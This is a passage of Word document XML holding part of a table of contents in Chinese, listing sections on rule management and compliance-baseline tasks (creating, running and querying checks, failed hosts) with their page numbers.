              <w:t>5.9.4 删除单条规则</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166239 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>300</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B560953" w14:textId="527F73FA" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166240" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.9.5 批量删除规则</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166240 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>301</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4EB07C42" w14:textId="440FD3B7" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166241" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.9.6 查询规则</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166241 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>302</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="639BD846" w14:textId="1CCAF435" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166242" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.9.7 查询单条规则</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166242 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>305</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CC4EFA3" w14:textId="50458EB3" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166243" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.9.8 更新单条规则</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166243 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>308</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A2A23DE" w14:textId="757EEE68" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166244" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.9.9 开关单条规则</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166244 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>309</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1DAEEBF8" w14:textId="68C90836" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166245" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6 合规基线</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166245 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>311</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A9F4748" w14:textId="15517F2E" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166246" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1 新建任务</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166246 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>311</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B7E8C38" w14:textId="5A8024D8" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166247" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2 删除任务</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166247 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>313</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="30D60BDF" w14:textId="28AA0D00" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166248" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.3 修改任务请求</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166248 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>314</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E924773" w14:textId="54689BB1" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166249" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.4 查询任务</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166249 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>316</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CCBCDA8" w14:textId="724700A9" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166250" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.5 执行任务</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166250 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>318</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="619D9FCA" w14:textId="0A8F50A8" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166251" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.6 查询任务执行任务</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166251 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>319</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7707E8AA" w14:textId="6B0385A7" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166252" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.7 查询基线规则</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166252 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>320</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0575AB43" w14:textId="57ABA173" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166253" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.8 查询检查结果</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166253 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>323</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E37D33A" w14:textId="654915CE" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166254" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.9 查询检失败主机</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166254 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>326</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EAF2028" w14:textId="270A4E49" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
